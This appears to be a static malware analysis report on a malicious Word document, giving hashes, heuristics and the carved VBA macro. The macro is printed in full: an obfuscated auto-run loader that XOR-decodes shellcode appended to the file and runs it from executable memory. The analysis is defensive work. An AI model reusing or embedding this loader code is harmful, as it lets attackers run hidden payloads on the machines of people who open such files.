Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9db87447dc884408…

MALICIOUS

Office (OLE)

37.2 KB Created: 2017-07-22 14:57:00 Authoring application: Microsoft Office Word First seen: 2018-03-04
MD5: 9e689977de74d7dead9a04de7625a535 SHA-1: fdeaa3811efacf3dd700bc8da86315c1f6a4e561 SHA-256: 9db87447dc884408b15430068e89b4ddb5897f87868cc9c74a46d8f5c2f7f0a6
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer (T1105 is inferred from the ClamAV signature name only; the macro itself makes no network request — it decodes and executes shellcode carried inside the document file)

The sample is a malicious Word document (ThisDocument module, ActiveDocument reference) containing VBA macros. The Document_Open handler reads the document's own bytes from disk, splits the file on a long marker string, takes the trailing segment, XOR-decodes it with the static key "UGOGQaAqkUkfYs", copies the result into memory obtained from VirtualAlloc with MEM_COMMIT / PAGE_EXECUTE_READWRITE via NtWriteVirtualMemory on the current process, and starts it with CreateThread. In other words the macro is a self-contained in-memory shellcode loader whose payload is appended to the document after the marker; no URL, PowerShell or download string appears in the macro code. Note that 'macros.bas' is the analysis tool's name for the carved VBA module, not a file embedded in the document. The ClamAV signature name 'Doc.Downloader.Powload-6809817-0' implies that the decoded shellcode downloads a second stage, but that behaviour cannot be confirmed from this static listing alone; dynamic analysis of the decoded shellcode is needed to recover any C2 or payload URLs.

Heuristics 7

  • ClamAV: Doc.Downloader.Powload-6809817-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6809817-0
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
Reference to VirtualAlloc API (declared under an obfuscated alias alongside CreateThread and an un-aliased NtWriteVirtualMemory import from NTDLL — the allocate / write / execute triad typical of in-process shellcode loaders)
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
        sFDscPENkZcakNaiwFAc
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        Document_Open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard OOXML DrawingML XML namespace present in ordinary Office documents and is not an indicator on its own.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4807 bytes
SHA-256: 0fa28bfeea38ba2a7aebdab158aae543bfef62c98bb4d12e7d91166f38d8f22a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
37 of 72 identifiers look randomly generated (e.g. 'dcmbPzFkxULfrVyxZXuFYIZdRROMGfkAEUIJatYm') — consistent with name-mangling obfuscation. The carved artifact also contains one long alphabetic blob; in the script it is the literal passed to Split() as a delimiter, i.e. a marker locating the appended payload inside the document file, rather than base64 data that is decoded by the macro.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst notes: module attributes as exported by olevba. VB_Name / VB_Base
' identify this as the Word "ThisDocument" class module (the module that
' receives the Document_Open auto-execute event), not a standalone .bas file;
' "macros.bas" is just the name the carving tool gave the export.
Option Explicit

' Analyst notes: Win32 imports hidden behind random alias names. The real
' export names are in the Alias clauses: CreateThread and VirtualAlloc from
' kernel32. NtWriteVirtualMemory is imported from NTDLL under its own name
' (the native-API sibling of WriteProcessMemory; presumably chosen to avoid
' user-mode hooks on the kernel32 wrapper -- inference, not visible here).
' Both branches declare the handle/address/size parameters as 32-bit Long,
' and the caller stores the VirtualAlloc result in a Long, so this reads as
' written for 32-bit Office. NOTE(review): behaviour under 64-bit Office is
' not established by this listing.
#If VBA7 Then
Private Declare PtrSafe Function WaiPxKyHvxHeL Lib "kernel32" Alias "CreateThread" (ByVal oobfZtFb As Long, ByVal CNgpDFBaDdpF As Long, ByVal QtvQVVVlnoeEaAuRf As LongPtr, fjulzkAaPGPTBRBPyIKjyJgdozbLD As Long, ByVal hixejwe As Long, TkpUgovtMnckcLhVAvd As Long) As LongPtr
Private Declare PtrSafe Function OzUDDRIVMNIsdvbBDOtMITbzxw Lib "kernel32" Alias "VirtualAlloc" (ByVal bzsCbU As Long, ByVal xxJPcFwl As Long, ByVal eNeodbDKKF As Long, ByVal cKsHIe As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal ECuyVijN As Long, ByVal VsJMIeNLlHoZaVIRwQfMebhX As Long, ByVal SIRGSWepmHrbSvXW As String, ByVal waQiDHLGyrdaKTlLpPvWe As Long, ByRef LkJNnqQDviPwFg As Long) As Long
#Else
Private Declare Function WaiPxKyHvxHeL Lib "kernel32" Alias "CreateThread"  (ByVal oobfZtFb As Long, ByVal CNgpDFBaDdpF As Long, ByVal QtvQVVVlnoeEaAuRf As Long, fjulzkAaPGPTBRBPyIKjyJgdozbLD As Long, ByVal hixejwe As Long, TkpUgovtMnckcLhVAvd As Long) As Long
Private Declare Function OzUDDRIVMNIsdvbBDOtMITbzxw Lib "kernel32" Alias "VirtualAlloc" (ByVal bzsCbU As Long, ByVal xxJPcFwl As Long, ByVal eNeodbDKKF As Long, ByVal cKsHIe As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal ECuyVijN As Long, ByVal VsJMIeNLlHoZaVIRwQfMebhX As Long, ByVal SIRGSWepmHrbSvXW As String, ByVal waQiDHLGyrdaKTlLpPvWe As Long, ByRef LkJNnqQDviPwFg As Long) As Long
#End If

' VirtualAlloc arguments: &H1000 is passed as flAllocationType (MEM_COMMIT)
' and &H40 as flProtect (PAGE_EXECUTE_READWRITE), so the loader asks for a
' committed buffer that is writable AND executable -- the RWX allocation a
' memory scanner or EDR would flag.
Const KFABtYYXdGnyHhelRhqXIeppQ = &H1000
Const VKYYWgSsSVtwjhEXVJ = &H40

' Loader entry point, called from Document_Open. Steps:
'   1. read this document's own bytes from disk (ActiveDocument.FullName),
'   2. split the file on a long marker literal and keep the trailing segment,
'   3. XOR-decode that segment with the static key "UGOGQaAqkUkfYs",
'   4. copy the result into an RWX buffer in this process and start it on a
'      new thread.
' No network call, URL or PowerShell string appears in this module; the
' payload is carried inside the document file itself, after the marker.
Public Sub sFDscPENkZcakNaiwFAc()
    Dim hTWyJvFUaKW() As Byte

    ' Raw bytes of the document that is currently open (the carrier file).
    hTWyJvFUaKW = HzFeaIgHEIpgNCyTlQraWB(ActiveDocument.FullName)
    Dim axvWXieFsOtgWrXiTODjZtl As String
    ' StrConv(..., 64) is vbUnicode: widens the byte array into a String so
    ' the file contents can be handled with Split/Mid$.
    axvWXieFsOtgWrXiTODjZtl = StrConv(hTWyJvFUaKW, 64)
    
    Dim GTsuYSjogokqElzxwwUsAPC
    ' The long "random" literal is a delimiter, not encoded data: the payload
    ' is appended to the document after this marker, so the last element of
    ' the split is the encoded shellcode.
    GTsuYSjogokqElzxwwUsAPC = Split(axvWXieFsOtgWrXiTODjZtl, "dcmbPzFkxULfrVyxZXuFYIZdRROMGfkAEUIJatYmHRHQrBLVLpXpwDUvdjjXKSEsKlBxmOwFYhYhajLpgSbqhUdaZnGRjbBOnpfgaoIWSrqpFNuTxURSRnkQhAxZiFvXFjTLeFpRjexPDOumSMtpjJXZepYzQJOnVtJvTJPREaIMPumsglgvlgOW")

    Dim xwbmgNNHlJqdP As String
    Dim sxzMONfIJ As String
    Dim IhDCINUxbMdgPbxPfIxYhsquLxvI As String
    ' vbUnicode (64) then vbFromUnicode (128) round-trip on the trailing
    ' segment. NOTE(review): the net effect on the bytes is not obvious from
    ' the listing -- confirm in a debugger before building a static decoder.
    sxzMONfIJ = StrConv(StrConv(GTsuYSjogokqElzxwwUsAPC(UBound(GTsuYSjogokqElzxwwUsAPC)), 64), 128)
    ' Drop the first two characters of the segment (Mid$ starts at position 3).
    IhDCINUxbMdgPbxPfIxYhsquLxvI = Mid$(sxzMONfIJ, 3, Len(sxzMONfIJ))

    ' Repeating-key XOR decode with the hard-coded key "UGOGQaAqkUkfYs".
    xwbmgNNHlJqdP = XKMdzgMHnkGdDZxflIxpZIwkKO("UGOGQaAqkUkfYs", IhDCINUxbMdgPbxPfIxYhsquLxvI)
    
    Dim irpIlXZdAhGpkKRcnYfKhFoojSv As Long
    Dim isKiGvHlFcNaWcrlmFiLseqZQYMC As Long

    ' VirtualAlloc(NULL, Len(payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE):
    ' executable buffer sized to the decoded payload, address chosen by the OS.
    irpIlXZdAhGpkKRcnYfKhFoojSv = OzUDDRIVMNIsdvbBDOtMITbzxw(0, Len(xwbmgNNHlJqdP), KFABtYYXdGnyHhelRhqXIeppQ, VKYYWgSsSVtwjhEXVJ)
    ' NtWriteVirtualMemory(-1, buf, payload, len, 0): handle -1 is the
    ' current-process pseudo-handle, so the decoded bytes are written into
    ' the Office process itself (self-injection, no remote target).
    ' A VBA String passed ByVal to a Declare is marshalled as an ANSI byte
    ' pointer, which is what lets the decoded string serve as raw bytes here.
    isKiGvHlFcNaWcrlmFiLseqZQYMC = NtWriteVirtualMemory(-1, irpIlXZdAhGpkKRcnYfKhFoojSv, xwbmgNNHlJqdP, Len(xwbmgNNHlJqdP), 0)
    ' CreateThread(NULL, 0, buf, NULL, 0, NULL): the buffer address is the
    ' thread start routine, so the decoded payload runs as native code on a
    ' new thread. Neither return value is checked and the thread is not
    ' waited on, so the macro returns while the shellcode keeps running.
    isKiGvHlFcNaWcrlmFiLseqZQYMC = WaiPxKyHvxHeL(0, 0, irpIlXZdAhGpkKRcnYfKhFoojSv, 0, 0, 0)
End Sub

' Reads the whole file at the given path into a Byte array (used by the
' loader to read the document's own bytes).
' Raises VBA run-time error 53 ("File not found") when Dir() returns "".
' NOTE(review): ReDim to LOF - 1 means a zero-length file would most likely
' raise (upper bound -1) rather than return an empty array; irrelevant for an
' open document, noted for completeness.
Public Function HzFeaIgHEIpgNCyTlQraWB(ByVal WisADeVVvILPvMvOUlQStXaak As String) As Byte()
    Dim sxzMONfIJ As Long
    Dim IhDCINUxbMdgPbxPfIxYhsquLxvI() As Byte
    sxzMONfIJ = FreeFile
    If LenB(Dir(WisADeVVvILPvMvOUlQStXaak)) Then
        ' Binary read of the entire file; the array is sized to LOF() bytes.
        Open WisADeVVvILPvMvOUlQStXaak For Binary Access Read As sxzMONfIJ
        ReDim IhDCINUxbMdgPbxPfIxYhsquLxvI(LOF(sxzMONfIJ) - 1&) As Byte
        Get sxzMONfIJ, , IhDCINUxbMdgPbxPfIxYhsquLxvI
        Close sxzMONfIJ
    Else
        Err.Raise 53
    End If
    HzFeaIgHEIpgNCyTlQraWB = IhDCINUxbMdgPbxPfIxYhsquLxvI
    Erase IhDCINUxbMdgPbxPfIxYhsquLxvI
End Function

' Word auto-execute event: fires when the document is opened with macros
' enabled. This is the only automatic trigger for the loader in this module.
Public Sub Document_Open()
    sFDscPENkZcakNaiwFAc
End Sub

' Excel auto-execute event name. Word does not raise Workbook_Open, so in
' this ThisDocument module it is dead code -- presumably emitted by a
' builder that produces the same loader for Word and Excel (inference).
Sub Workbook_Open()
    Document_Open
End Sub

' Repeating-key XOR: returns the second argument with each character XORed
' against the key (first argument), cycling through the key position by
' position (1-based, wrapping via Mod). Symmetric, so the same routine
' encodes and decodes.
' The local KFABtYYXdGnyHhelRhqXIeppQ shadows the module-level Const of the
' same name (&H1000) inside this function -- name reuse by the obfuscator,
' with no effect on the loader (inference).
Public Function XKMdzgMHnkGdDZxflIxpZIwkKO(RjRlrlDdcrdq As String, KiSyRVEsSpAPYtUpoBsKQVxwYoR As String) As String
    Dim VvOhrCERPXtOkXYUqvtSJNOPKFeOK As Long
    Dim zDdFxxAsxwOcAqi As String
    Dim ATXDfCVZphGYwMxPgtx As Integer, KFABtYYXdGnyHhelRhqXIeppQ As Integer, a As Long

    For VvOhrCERPXtOkXYUqvtSJNOPKFeOK = 1 To Len(KiSyRVEsSpAPYtUpoBsKQVxwYoR)
        ' Key index: i Mod keylen, with 0 mapped to keylen because Mid$ is 1-based.
        a = VvOhrCERPXtOkXYUqvtSJNOPKFeOK Mod Len(RjRlrlDdcrdq)
        If a = 0 Then a = Len(RjRlrlDdcrdq)
        
        ATXDfCVZphGYwMxPgtx = Asc(Mid$(KiSyRVEsSpAPYtUpoBsKQVxwYoR, VvOhrCERPXtOkXYUqvtSJNOPKFeOK, 1))
        KFABtYYXdGnyHhelRhqXIeppQ = Asc(Mid$(RjRlrlDdcrdq, a, 1))
        ' Character-by-character string concatenation (quadratic in payload length).
        zDdFxxAsxwOcAqi = zDdFxxAsxwOcAqi + Chr(ATXDfCVZphGYwMxPgtx Xor KFABtYYXdGnyHhelRhqXIeppQ)
    Next VvOhrCERPXtOkXYUqvtSJNOPKFeOK
    
   XKMdzgMHnkGdDZxflIxpZIwkKO = zDdFxxAsxwOcAqi
End Function